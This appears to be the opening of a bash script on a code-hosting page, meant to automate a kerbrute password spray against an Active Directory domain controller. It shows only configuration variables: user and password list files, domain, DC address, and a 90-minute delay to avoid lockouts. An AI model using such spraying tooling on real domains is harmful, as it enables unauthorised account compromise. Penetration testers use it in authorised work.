This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ## Automate kerbrute password spray with user and password list | |
| # Define variables | |
| USER_FILE="users.txt" | |
| PASSWORD_FILE="pass.txt" | |
| DOMAIN="domain.local" | |
| DC_IP="10.30.30.30" | |
| KERBRUTE_EXEC="./kerbrute_linux_amd64" | |
| DELAY=5400 # 90 minute delay in seconds |